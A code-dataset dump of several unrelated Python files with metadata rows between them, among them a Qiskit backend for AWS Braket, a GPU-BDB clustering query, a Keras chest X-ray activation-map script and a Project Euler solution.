# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
from datetime import datetime, timedelta
from braket.device_schema.device_service_properties_v1 import DeviceCost
from typing import List, Dict, Optional, Any, Union, Tuple
from botocore.response import StreamingBody
from braket.aws import AwsDevice, AwsQuantumTask, AwsSession
from braket.circuits import Circuit
from braket.device_schema import DeviceCapabilities
from braket.device_schema.ionq import IonqDeviceCapabilities
from braket.device_schema.rigetti import RigettiDeviceCapabilities
from braket.device_schema.simulators import GateModelSimulatorDeviceCapabilities
from qiskit.providers import BaseBackend, JobStatus
from qiskit.providers.models import QasmBackendConfiguration, BackendProperties, BackendStatus
from qiskit.qobj import QasmQobj
from . import awsjob
from . import awsprovider
from .conversions_configuration import aws_device_2_configuration
from .conversions_properties import aws_ionq_to_properties, aws_rigetti_to_properties, aws_simulator_to_properties
from .transpilation import convert_qasm_qobj
logger = logging.getLogger(__name__)
class AWSBackend(BaseBackend):
_aws_device: AwsDevice
_configuration: QasmBackendConfiguration
_provider: 'awsprovider.AWSProvider'
def __init__(self, aws_device: AwsDevice, provider: 'awsprovider.AWSProvider' = None):
super().__init__(aws_device_2_configuration(aws_device), provider)
self._aws_device = aws_device
self._run = aws_device.run
def properties(self) -> BackendProperties:
properties: DeviceCapabilities = self._aws_device.properties
if isinstance(properties, IonqDeviceCapabilities):
return aws_ionq_to_properties(properties, self._configuration)
if isinstance(properties, RigettiDeviceCapabilities):
return aws_rigetti_to_properties(properties, self._configuration)
if isinstance(properties, GateModelSimulatorDeviceCapabilities):
return aws_simulator_to_properties(properties, self._configuration)
def status(self) -> BackendStatus:
# now = datetime.now()
# windows = self._aws_device.properties.service.executionWindows
# is_in_execution_window = windows.
status: str = self._aws_device.status
backend_status: BackendStatus = BackendStatus(
backend_name=self.name(),
backend_version=self.version(),
operational=False,
pending_jobs=0, # TODO
status_msg=status
)
if status == 'ONLINE':
backend_status.operational = True
elif status == 'OFFLINE':
backend_status.operational = False
else:
backend_status.operational = False
return backend_status
def _get_job_data_s3_folder(self, job_id):
return f"results-{self.name()}-{job_id}"
@staticmethod
def _exists_file(s3_client, s3_bucket: str, file: str):
result: dict = s3_client.list_objects_v2(
Bucket=s3_bucket,
Prefix=file
)
# TODO: error handling
return result['KeyCount'] != 0
def _save_job_task_arns(self, job_id: str, task_arns: List[str],
s3_bucket: Optional[str] = None) -> AwsSession.S3DestinationFolder:
used_s3_bucket = s3_bucket or self._provider.get_default_bucket()
s3_client = self._provider.get_s3_client()
file = f'{self._get_job_data_s3_folder(job_id=job_id)}/task_arns.json'
if AWSBackend._exists_file(s3_client, used_s3_bucket, file):
raise ValueError(f"An object '{file}' does already exist in the bucket {used_s3_bucket}")
result = s3_client.put_object(Body=json.dumps(task_arns).encode(), Bucket=used_s3_bucket, Key=file)
# TODO: error handling
return used_s3_bucket, self._get_job_data_s3_folder(job_id=job_id)
def _delete_job_task_arns(self, job_id: str, s3_bucket: Optional[str] = None):
used_s3_bucket = s3_bucket or self._provider.get_default_bucket()
s3_client = self._provider.get_s3_client()
file = f'{self._get_job_data_s3_folder(job_id=job_id)}/task_arns.json'
if not AWSBackend._exists_file(s3_client, used_s3_bucket, file):
raise ValueError(f"An object '{file}' does not exist in the bucket {used_s3_bucket}")
result: dict = s3_client.delete_object(Bucket=used_s3_bucket, Key=file)
# TODO: error handling
def _load_job_task_arns(self, job_id: str, s3_bucket: Optional[str] = None) -> List[str]:
used_s3_bucket = s3_bucket or self._provider.get_default_bucket()
s3_client = self._provider.get_s3_client()
file = f'{self._get_job_data_s3_folder(job_id=job_id)}/task_arns.json'
if not AWSBackend._exists_file(s3_client, used_s3_bucket, file):
raise ValueError(f"An object '{file}' does not exist in the bucket {used_s3_bucket}")
result: dict = s3_client.get_object(Bucket=used_s3_bucket, Key=file)
# TODO: error handling
streaming_body: StreamingBody = result['Body']
data: bytes = streaming_body.read()
task_arns = json.loads(data.decode())
return task_arns
def _save_job_data_s3(self, qobj: QasmQobj, s3_bucket: Optional[str] = None,
extra_data: Optional[dict] = None) -> AwsSession.S3DestinationFolder:
used_s3_bucket: str = s3_bucket or self._provider.get_default_bucket()
s3_client = self._provider.get_s3_client()
file = f'{self._get_job_data_s3_folder(job_id=qobj.qobj_id)}/qiskit_qobj_data.json'
if AWSBackend._exists_file(s3_client, used_s3_bucket, file):
raise ValueError(f"An object '{file}' already exists at the bucket {used_s3_bucket}")
body = {
'qobj_id': qobj.qobj_id,
'qobj': qobj.to_dict()
}
if extra_data:
body['extra_data'] = extra_data
result = s3_client.put_object(Body=json.dumps(body).encode(), Bucket=used_s3_bucket, Key=file)
# TODO: error handling
return used_s3_bucket, self._get_job_data_s3_folder(job_id=qobj.qobj_id)
def _delete_job_data_s3(self, job_id: str, s3_bucket: Optional[str] = None):
used_s3_bucket = s3_bucket or self._provider.get_default_bucket()
s3_client = self._provider.get_s3_client()
file = f'{self._get_job_data_s3_folder(job_id=job_id)}/qiskit_qobj_data.json'
if not AWSBackend._exists_file(s3_client, used_s3_bucket, file):
raise ValueError(f"An object '{file}' does not exist in the bucket {used_s3_bucket}")
result: dict = s3_client.delete_object(Bucket=used_s3_bucket, Key=file)
# TODO: error handling
def _load_job_data_s3(self, job_id: str, s3_bucket: Optional[str] = None) -> Tuple[QasmQobj, dict]:
used_s3_bucket = s3_bucket or self._provider.get_default_bucket()
s3_client = self._provider.get_s3_client()
file = f'{self._get_job_data_s3_folder(job_id=job_id)}/qiskit_qobj_data.json'
if not AWSBackend._exists_file(s3_client, used_s3_bucket, file):
raise ValueError(f"An object '{file}' does not exist in the bucket {used_s3_bucket}")
result: dict = s3_client.get_object(Bucket=used_s3_bucket, Key=file)
# TODO: error handling
streaming_body: StreamingBody = result['Body']
data: bytes = streaming_body.read()
stored_experiment_data = json.loads(data.decode())
assert 'qobj' in stored_experiment_data
qobj_raw = stored_experiment_data['qobj']
qobj = QasmQobj.from_dict(qobj_raw)
extra_data = stored_experiment_data.get('extra_data', {})
return qobj, extra_data
def _create_task(self, job_id: str, qc: Circuit, shots: int, s3_bucket: Optional[str] = None) -> AwsQuantumTask:
used_s3_bucket: str = s3_bucket or self._provider.get_default_bucket()
task: AwsQuantumTask = self._aws_device.run(
task_specification=qc,
s3_destination_folder=(used_s3_bucket, self._get_job_data_s3_folder(job_id)),
shots=shots
)
return task
def jobs(
self,
limit: int = 10,
skip: int = 0,
status: Optional[Union[JobStatus, str, List[Union[JobStatus, str]]]] = None,
job_name: Optional[str] = None,
start_datetime: Optional[datetime] = None,
end_datetime: Optional[datetime] = None,
job_tags: Optional[List[str]] = None,
job_tags_operator: Optional[str] = "OR",
descending: bool = True,
db_filter: Optional[Dict[str, Any]] = None
) -> List['awsjob.AWSJob']:
# TODO: use job tags as meta data on s3, else use the method of active_jobs
pass
def active_jobs(self, limit: int = 10) -> List['awsjob.AWSJob']:
client = self._provider._aws_session.braket_client
task_arns = []
search_kwargs = {
'filters': [{
'name': self.name(),
'operator': 'EQUAL',
'values': ['CREATED', 'QUEUED', 'RUNNING']
}],
'maxResults': limit
}
nextToken = None
while True:
result: dict = client.search_quantum_tasks(**search_kwargs)
# Advance the pagination token; without this the loop would never terminate.
nextToken = result.get('nextToken')
if nextToken is None:
break
search_kwargs['nextToken'] = nextToken
# TODO: collect all task ARNs, query S3 for every task_arns.json key, determine
# which job each task belongs to, and load the jobs via their job_id
def retrieve_job(self, job_id: str, s3_bucket: Optional[str] = None) -> 'awsjob.AWSJob':
qobj, extra_data = self._load_job_data_s3(job_id=job_id, s3_bucket=s3_bucket)
arns = self._load_job_task_arns(job_id=job_id, s3_bucket=s3_bucket)
tasks = [AwsQuantumTask(arn=arn) for arn in arns]
job = awsjob.AWSJob(
job_id=job_id,
qobj=qobj,
tasks=tasks,
extra_data=extra_data,
s3_bucket=s3_bucket,
backend=self
)
return job
def estimate_costs(self, qobj: QasmQobj) -> Optional[float]:
shots = qobj.config.shots
no_experiments = len(qobj.experiments)
cost: DeviceCost = self._aws_device.properties.service.deviceCost
if cost.unit == 'shot':
return shots * no_experiments * cost.price
elif cost.unit == 'hour':
time_per_experiment = timedelta(seconds=10) # TODO: make this a better estimate: depends on no_qubits and depth
total_time = shots * no_experiments * time_per_experiment
return total_time.total_seconds() / 60 / 60 * cost.price
else:
return None
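# Illustrative cost arithmetic for estimate_costs (hypothetical prices, not taken
# from any real device): with 1024 shots and 3 experiments, a shot-priced device
# at 0.00035 USD/shot gives 1024 * 3 * 0.00035 = 1.0752 USD, while an hour-priced
# device at 4.50 USD/h with the assumed 10 s per experiment comes to
# (1024 * 3 * 10 s) / 3600 * 4.50 = 38.40 USD.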
def run(self, qobj: QasmQobj, s3_bucket: Optional[str] = None, extra_data: Optional[dict] = None):
# Persist the job data first; _save_job_data_s3 raises a ValueError if data for this qobj_id already exists.
circuits: List[Circuit] = list(convert_qasm_qobj(qobj))
shots = qobj.config.shots
tasks: List[AwsQuantumTask] = []
try:
s3_location: AwsSession.S3DestinationFolder = self._save_job_data_s3(qobj, s3_bucket=s3_bucket, extra_data=extra_data)
for circuit in circuits:
task = self._aws_device.run(
task_specification=circuit,
s3_destination_folder=s3_location,
shots=shots
)
tasks.append(task)
task_arns = [t.id for t in tasks]
self._save_job_task_arns(job_id=qobj.qobj_id, task_arns=task_arns, s3_bucket=s3_location[0])
except Exception as ex:
logger.error(f'An error occurred while creating tasks: {ex}')
logger.error(f'Cancelling all {len(tasks)} tasks created so far!')
for task in tasks:
logger.error(f'Attempt to cancel {task.id}...')
task.cancel()
logger.error(f'State of {task.id}: {task.state()}.')
self._delete_job_task_arns(qobj.qobj_id, s3_bucket=s3_bucket)
self._delete_job_data_s3(qobj.qobj_id, s3_bucket=s3_bucket)
raise ex
job = awsjob.AWSJob(
job_id=qobj.qobj_id,
qobj=qobj,
tasks=tasks,
extra_data=extra_data,
s3_bucket=s3_location[0],
backend=self
)
return job
| 45.138889
| 144
| 0.666923
| 1,664
| 13,000
| 4.918269
| 0.16887
| 0.058651
| 0.041056
| 0.026393
| 0.417155
| 0.377199
| 0.353495
| 0.34433
| 0.31085
| 0.306574
| 0
| 0.014246
| 0.244077
| 13,000
| 287
| 145
| 45.296167
| 0.818561
| 0.089154
| 0
| 0.26009
| 0
| 0
| 0.098713
| 0.039197
| 0
| 0
| 0
| 0.003484
| 0.004484
| 1
| 0.076233
| false
| 0.008969
| 0.089686
| 0.004484
| 0.255605
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe30812932f608889eaceef38afb76f593b3db27
| 3,830
|
py
|
Python
|
gpu_bdb/queries/q26/gpu_bdb_query_26.py
|
VibhuJawa/gpu-bdb
|
13987b4ef8b92db3b9d2905dec7bd2fd81f42ae9
|
[
"Apache-2.0"
] | 62
|
2020-05-14T13:33:02.000Z
|
2020-10-29T13:28:26.000Z
|
gpu_bdb/queries/q26/gpu_bdb_query_26.py
|
VibhuJawa/gpu-bdb
|
13987b4ef8b92db3b9d2905dec7bd2fd81f42ae9
|
[
"Apache-2.0"
] | 104
|
2020-07-01T21:07:42.000Z
|
2020-11-13T16:36:04.000Z
|
gpu_bdb/queries/q26/gpu_bdb_query_26.py
|
VibhuJawa/gpu-bdb
|
13987b4ef8b92db3b9d2905dec7bd2fd81f42ae9
|
[
"Apache-2.0"
] | 21
|
2020-05-14T14:44:40.000Z
|
2020-11-07T12:08:28.000Z
|
#
# Copyright (c) 2019-2022, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from bdb_tools.utils import (
benchmark,
gpubdb_argparser,
train_clustering_model,
run_query,
)
from bdb_tools.q26_utils import (
Q26_CATEGORY,
Q26_ITEM_COUNT,
N_CLUSTERS,
CLUSTER_ITERATIONS,
N_ITER,
read_tables
)
import numpy as np
from dask import delayed
def agg_count_distinct(df, group_key, counted_key):
"""Returns a Series that is the result of counting distinct instances of 'counted_key' within each 'group_key'.
The series' index will have one entry per unique 'group_key' value.
Workaround for lack of nunique aggregate function on Dask df.
"""
return (
df.drop_duplicates([group_key, counted_key])
.groupby(group_key)[counted_key]
.count()
)
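# Sketch of the workaround on toy data (hypothetical column names 'g' and 'c'):
# for rows (1, 'a'), (1, 'a'), (1, 'b'), (2, 'a'), drop_duplicates(['g', 'c'])
# keeps (1, 'a'), (1, 'b'), (2, 'a'), so agg_count_distinct(df, 'g', 'c') returns
# the Series {1: 2, 2: 1} -- the same per-group distinct count that
# groupby('g')['c'].nunique() would give if it were supported.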
def get_clusters(client, kmeans_input_df):
import dask_cudf
ml_tasks = [
delayed(train_clustering_model)(df, N_CLUSTERS, CLUSTER_ITERATIONS, N_ITER)
for df in kmeans_input_df.to_delayed()
]
results_dict = client.compute(*ml_tasks, sync=True)
output = kmeans_input_df.index.to_frame().reset_index(drop=True)
labels_final = dask_cudf.from_cudf(
results_dict["cid_labels"], npartitions=output.npartitions
)
output["label"] = labels_final.reset_index()[0]
# Sort based on CDH6.1 q26-result formatting
output = output.sort_values(["ss_customer_sk"])
# Based on CDH6.1 q26-result formatting
results_dict["cid_labels"] = output
return results_dict
def main(client, config):
import cudf
ss_ddf, items_ddf = benchmark(
read_tables,
config=config,
compute_result=config["get_read_time"],
)
items_filtered = items_ddf[items_ddf.i_category == Q26_CATEGORY].reset_index(
drop=True
)
items_filtered = items_filtered[["i_item_sk", "i_class_id"]]
f_ss_ddf = ss_ddf[ss_ddf["ss_customer_sk"].notnull()].reset_index(drop=True)
merged_ddf = f_ss_ddf.merge(
items_filtered, left_on="ss_item_sk", right_on="i_item_sk", how="inner"
)
keep_cols = ["ss_customer_sk", "i_class_id"]
merged_ddf = merged_ddf[keep_cols]
# One-Hot-Encode i_class_id
merged_ddf = merged_ddf.map_partitions(
cudf.get_dummies,
columns=["i_class_id"],
prefix="id",
cats={"i_class_id": np.arange(1, 16, dtype="int32")},
prefix_sep="",
dtype="float32",
)
merged_ddf["total"] = 1.0 # Will keep track of total count
all_categories = ["total"] + ["id%d" % i for i in range(1, 16)]
# Aggregate using agg to get sorted ss_customer_sk
agg_dict = dict.fromkeys(all_categories, "sum")
rollup_ddf = merged_ddf.groupby("ss_customer_sk").agg(agg_dict)
rollup_ddf = rollup_ddf[rollup_ddf.total > Q26_ITEM_COUNT][all_categories[1:]]
# Prepare data for KMeans clustering
rollup_ddf = rollup_ddf.astype("float64")
kmeans_input_df = rollup_ddf.persist()
results_dict = get_clusters(client=client, kmeans_input_df=kmeans_input_df)
return results_dict
if __name__ == "__main__":
from bdb_tools.cluster_startup import attach_to_cluster
config = gpubdb_argparser()
client, bc = attach_to_cluster(config)
run_query(config=config, client=client, query_func=main)
| 31.138211
| 115
| 0.703655
| 549
| 3,830
| 4.621129
| 0.380692
| 0.024832
| 0.030745
| 0.021285
| 0.076074
| 0.069373
| 0.044935
| 0
| 0
| 0
| 0
| 0.014984
| 0.198433
| 3,830
| 122
| 116
| 31.393443
| 0.811401
| 0.268407
| 0
| 0.026316
| 0
| 0
| 0.07709
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039474
| false
| 0
| 0.092105
| 0
| 0.171053
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe3188f73830a0839c72948677e1605c9ae2ae83
| 1,586
|
py
|
Python
|
tdclient/test/database_model_test.py
|
minchuang/td-client-python
|
6cf6dfbb60119f400274491d3e942d4f9fbcebd6
|
[
"Apache-2.0"
] | 2
|
2019-02-22T11:56:17.000Z
|
2019-02-25T10:09:46.000Z
|
tdclient/test/database_model_test.py
|
minchuang/td-client-python
|
6cf6dfbb60119f400274491d3e942d4f9fbcebd6
|
[
"Apache-2.0"
] | null | null | null |
tdclient/test/database_model_test.py
|
minchuang/td-client-python
|
6cf6dfbb60119f400274491d3e942d4f9fbcebd6
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
from __future__ import print_function
from __future__ import unicode_literals
try:
from unittest import mock
except ImportError:
import mock
from tdclient import models
from tdclient.test.test_helper import *
def setup_function(function):
unset_environ()
def test_database():
client = mock.MagicMock()
database = models.Database(client, "sample_datasets", tables=["nasdaq", "www_access"], count=12345, created_at="created_at", updated_at="updated_at", org_name="org_name", permission="administrator")
assert database.org_name == "org_name"
assert database.permission == "administrator"
assert database.count == 12345
assert database.name == "sample_datasets"
assert database.tables() == ["nasdaq", "www_access"]
assert database.created_at == "created_at"
assert database.updated_at == "updated_at"
def test_database_update_tables():
client = mock.MagicMock()
client.tables = mock.MagicMock(return_value=[
models.Table(client, "sample_datasets", "foo", "type", "schema", "count"),
models.Table(client, "sample_datasets", "bar", "type", "schema", "count"),
models.Table(client, "sample_datasets", "baz", "type", "schema", "count"),
])
database = models.Database(client, "sample_datasets", tables=None, count=12345, created_at="created_at", updated_at="updated_at", org_name="org_name", permission="administrator")
tables = database.tables()
assert [ table.name for table in tables ] == ["foo", "bar", "baz"]
client.tables.assert_called_with("sample_datasets")
| 40.666667
| 202
| 0.713745
| 193
| 1,586
| 5.621762
| 0.295337
| 0.090323
| 0.092166
| 0.04977
| 0.354839
| 0.326267
| 0.326267
| 0.237788
| 0.152995
| 0.152995
| 0
| 0.011095
| 0.147541
| 1,586
| 38
| 203
| 41.736842
| 0.79142
| 0.01261
| 0
| 0.064516
| 0
| 0
| 0.20639
| 0
| 0
| 0
| 0
| 0
| 0.290323
| 1
| 0.096774
| false
| 0
| 0.225806
| 0
| 0.322581
| 0.032258
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe31f26debb52795b22561b36355ce06ff7905d8
| 558
|
py
|
Python
|
setup.py
|
ballcap231/fireTS
|
74cc89a14d67edabf31139d1552025d54791f2a9
|
[
"MIT"
] | null | null | null |
setup.py
|
ballcap231/fireTS
|
74cc89a14d67edabf31139d1552025d54791f2a9
|
[
"MIT"
] | null | null | null |
setup.py
|
ballcap231/fireTS
|
74cc89a14d67edabf31139d1552025d54791f2a9
|
[
"MIT"
] | null | null | null |
from setuptools import setup
dependencies = [
'numpy',
'scipy',
'scikit-learn',
]
setup(
name='fireTS',
version='0.0.7',
description='A python package for multi-variate time series prediction',
long_description=open('README.md').read(),
long_description_content_type="text/markdown",
url='https://github.com/jxx123/fireTS.git',
author='Jinyu Xie',
author_email='xjygr08@gmail.com',
license='MIT',
packages=['fireTS'],
install_requires=dependencies,
include_package_data=True,
zip_safe=False)
| 24.26087
| 76
| 0.677419
| 67
| 558
| 5.507463
| 0.835821
| 0.081301
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017429
| 0.177419
| 558
| 22
| 77
| 25.363636
| 0.786492
| 0
| 0
| 0
| 0
| 0
| 0.327957
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.05
| 0
| 0.05
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe3273d41978521818a7243089a132072ef92c5a
| 883
|
py
|
Python
|
euler/py/project_019.py
|
heyihan/scodes
|
342518b548a723916c9273d8ebc1b345a0467e76
|
[
"BSD-3-Clause"
] | null | null | null |
euler/py/project_019.py
|
heyihan/scodes
|
342518b548a723916c9273d8ebc1b345a0467e76
|
[
"BSD-3-Clause"
] | null | null | null |
euler/py/project_019.py
|
heyihan/scodes
|
342518b548a723916c9273d8ebc1b345a0467e76
|
[
"BSD-3-Clause"
] | null | null | null |
# https://projecteuler.net/problem=19
def is_leap(year):
if year%4 != 0:
return False
if year%100 == 0 and year%400 != 0:
return False
return True
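# Sanity checks for the Gregorian leap-year rules above:
# is_leap(1996) -> True  (divisible by 4, not by 100)
# is_leap(1900) -> False (divisible by 100 but not by 400)
# is_leap(2000) -> True  (divisible by 400)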
def year_days(year):
if is_leap(year):
return 366
return 365
def month_days(month, year):
if month == 4 or month == 6 or month == 9 or month == 11:
return 30
if month == 2:
if is_leap(year):
return 29
return 28
return 31
day_19000101 = 1
days_1900 = year_days(1900)
day_next_day1 = (day_19000101 + days_1900)%7
print(day_19000101, days_1900, day_next_day1)
sum = 0
for i in range(1901, 2001):
for j in range(1, 13):
if day_next_day1 == 0:
print(i, j)
sum = sum + 1
days = month_days(j, i)
day_next_day1 = (day_next_day1 + days)%7
#print(i, j, days, day_next_day1)
print(sum)
| 20.534884
| 61
| 0.582106
| 142
| 883
| 3.443662
| 0.338028
| 0.08589
| 0.134969
| 0.04908
| 0.151329
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156507
| 0.312571
| 883
| 42
| 62
| 21.02381
| 0.649094
| 0.075878
| 0
| 0.129032
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096774
| false
| 0
| 0
| 0
| 0.387097
| 0.096774
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe3415df5ab13d93fe351122344f2bd2d2fe4c5f
| 3,839
|
py
|
Python
|
inference.py
|
zzhang87/ChestXray
|
eaafe2f7f5e91bb30fbed02dec1f77ff314434b5
|
[
"MIT"
] | null | null | null |
inference.py
|
zzhang87/ChestXray
|
eaafe2f7f5e91bb30fbed02dec1f77ff314434b5
|
[
"MIT"
] | 11
|
2020-01-28T21:44:26.000Z
|
2022-03-11T23:19:37.000Z
|
inference.py
|
zzhang87/ChestXray
|
eaafe2f7f5e91bb30fbed02dec1f77ff314434b5
|
[
"MIT"
] | null | null | null |
import keras
import numpy as np
import pandas as pd
import cv2
import os
import json
import pdb
import argparse
import math
import copy
from vis.visualization import visualize_cam, overlay, visualize_activation
from vis.utils.utils import apply_modifications
from shutil import rmtree
import matplotlib.cm as cm
from matplotlib import pyplot as plt
from sklearn import metrics
import keras.backend as K
from keras import activations
from keras.applications.inception_v3 import preprocess_input as inception_pre
from keras.applications.mobilenet import preprocess_input as mobilenet_pre
from keras.applications.resnet50 import preprocess_input as resnet_pre
from keras.applications.densenet import preprocess_input as densenet_pre
from datagenerator import ImageDataGenerator
from utils import load_model
def getCAM(model, image):
# weights of the final fully-connected layer
weights = model.layers[-1].get_weights()[0]
# activation before the last global pooling
for layer in reversed(model.layers):
if len(layer.output_shape) > 2:
break
function = K.function([model.layers[0].input, K.learning_phase()], [layer.output])
activation = np.squeeze(function([image, 0])[0])
# weighted sum of the activation map
CAM = np.dot(activation, weights)
return CAM
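# Shape sketch (assuming a typical CNN backbone): for a single preprocessed image
# the selected layer output squeezes to roughly (h, w, channels), the final dense
# weights have shape (channels, num_classes), and the dot product therefore gives
# a coarse (h, w, num_classes) class activation map that main() slices per class
# and upsamples to the input resolution.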
def main():
ap = argparse.ArgumentParser()
ap.add_argument('--ckpt_path', help = 'Path to the model checkpoint.')
ap.add_argument('--image_path', help = 'Path to the image to run inference on.')
ap.add_argument('--bnbox', help = 'Path to the bounding box annotation, if applies.')
ap.add_argument('--threshold', default = 0.5, help = 'Threshold for displaying the Class Activation Map.')
args = ap.parse_args()
model_dir = os.path.dirname(args.ckpt_path)
with open(os.path.join(model_dir, 'label_map.json'), 'r') as f:
label_map = json.load(f)
num_class = len(list(label_map.keys()))
model, model_config = load_model(model_dir, args.ckpt_path)
model_name = model_config['model_name']
if model_name in ['inception']:
image_size = 299
else:
image_size = 224
preprocess_input = {
'inception': inception_pre,
'resnet': resnet_pre,
'mobilenet': mobilenet_pre,
'densenet': densenet_pre
}
bnbox = {}  # defined up front so the overlay loop below also works when no annotation file is given
if args.bnbox is not None:
annotation = pd.read_csv(args.bnbox)
image_index = os.path.basename(args.image_path)
indices = np.where(annotation['Image Index'] == image_index)[0]
for i in indices:
disease = annotation['Finding Label'][i]
x = int(annotation['Bbox [x'][i] + 0.5)
y = int(annotation['y'][i] + 0.5)
w = int(annotation['w'][i] + 0.5)
h = int(annotation['h]'][i] + 0.5)
bnbox[disease] = [x, y, x + w, y + h]
image = cv2.imread(args.image_path)
img = cv2.resize(image, (image_size, image_size))
img = preprocess_input[model_name](img.astype(np.float32))
img = np.expand_dims(img, axis = 0)
predictions = np.squeeze(model.predict(img))
CAM = getCAM(model, img)
cv2.namedWindow("ChestXray", cv2.WINDOW_NORMAL)
for key, value in label_map.items():
heatmap = CAM[:,:,int(key)]
heatmap -= heatmap.min()
heatmap *= 255.0 / heatmap.max()
heatmap[np.where(heatmap < args.threshold * 255)] *= 0.1
heatmap = cv2.applyColorMap(heatmap.astype(np.uint8), cv2.COLORMAP_JET)
heatmap = cv2.resize(heatmap, (image.shape[1], image.shape[0]), interpolation=cv2.INTER_AREA)  # dsize is (width, height)
overlay_img = overlay(heatmap, image, alpha = 0.4)
cv2.putText(overlay_img, "{}: {:.2%}".format(value, predictions[int(key)]),
(30,30), cv2.FONT_HERSHEY_DUPLEX, 1.0, (255,255,255), 2)
if value in bnbox:
box = bnbox[value]
cv2.rectangle(overlay_img, (box[0], box[1]), (box[2], box[3]),
color = (0, 180, 0), thickness = 2)
cv2.imshow("ChestXray", overlay_img)
cv2.waitKey()
plt.show()
print('{}: {:.2%}'.format(value, predictions[int(key)]))
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
| 27.035211
| 107
| 0.716593
| 572
| 3,839
| 4.681818
| 0.332168
| 0.033607
| 0.031367
| 0.034354
| 0.034354
| 0.021658
| 0
| 0
| 0
| 0
| 0
| 0.025962
| 0.147174
| 3,839
| 142
| 108
| 27.035211
| 0.791998
| 0.030998
| 0
| 0
| 0
| 0
| 0.094969
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020833
| false
| 0
| 0.25
| 0
| 0.28125
| 0.010417
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe34376d96d5593399f4f9364cf5da83ea7d813b
| 530
|
py
|
Python
|
test/DQueueTest.py
|
MistSun-Chen/py_verifier
|
7e9161d1fdbb611fe4be5eeb2f89a6286fa7b555
|
[
"MIT"
] | null | null | null |
test/DQueueTest.py
|
MistSun-Chen/py_verifier
|
7e9161d1fdbb611fe4be5eeb2f89a6286fa7b555
|
[
"MIT"
] | null | null | null |
test/DQueueTest.py
|
MistSun-Chen/py_verifier
|
7e9161d1fdbb611fe4be5eeb2f89a6286fa7b555
|
[
"MIT"
] | null | null | null |
from libTask import Queue
from common import configParams
from common import common
def main():
cp = configParams.ConfigParams("config.json")
detectGeneralQueue = Queue.DQueue(cp, len(cp.detect_general_ids), cp.modelPath, common.GENERALDETECT_METHOD_ID,
cp.GPUDevices, cp.detect_general_ids)
print("Run Into Next step")
smokeQueue = Queue.DQueue(cp, len(cp.smoke_ids), cp.modelPath, common.PEOPLESMOKE_METHOD_ID,cp.GPUDevices, cp.smoke_ids)
if __name__ == '__main__':
main()
| 35.333333
| 124
| 0.718868
| 68
| 530
| 5.338235
| 0.470588
| 0.055096
| 0.088154
| 0.088154
| 0.220386
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181132
| 530
| 15
| 125
| 35.333333
| 0.836406
| 0
| 0
| 0
| 0
| 0
| 0.06968
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.272727
| 0
| 0.363636
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe3599447ec843cd5c9296bccc205dff470707c7
| 1,417
|
py
|
Python
|
src/Knn-Tensor.py
|
python-itb/knn-from-scratch
|
